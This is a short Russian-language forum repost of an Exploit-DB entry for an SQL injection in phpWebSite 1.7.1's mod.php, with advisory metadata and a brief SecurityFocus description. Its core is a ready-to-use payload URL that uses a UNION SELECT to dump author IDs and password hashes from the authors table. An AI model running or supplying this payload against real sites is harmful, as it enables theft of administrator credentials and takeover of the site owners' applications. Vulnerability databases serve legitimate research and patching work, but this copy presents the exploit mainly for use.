Exploit phpWebSite 1.7.1 - 'mod.php' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
36085
Проверка EDB
  1. Пройдено
Автор
EHSAN_HP200
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-08-27
Код:
source: https://www.securityfocus.com/bid/49354/info

phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors
 
Источник
www.exploit-db.com

Похожие темы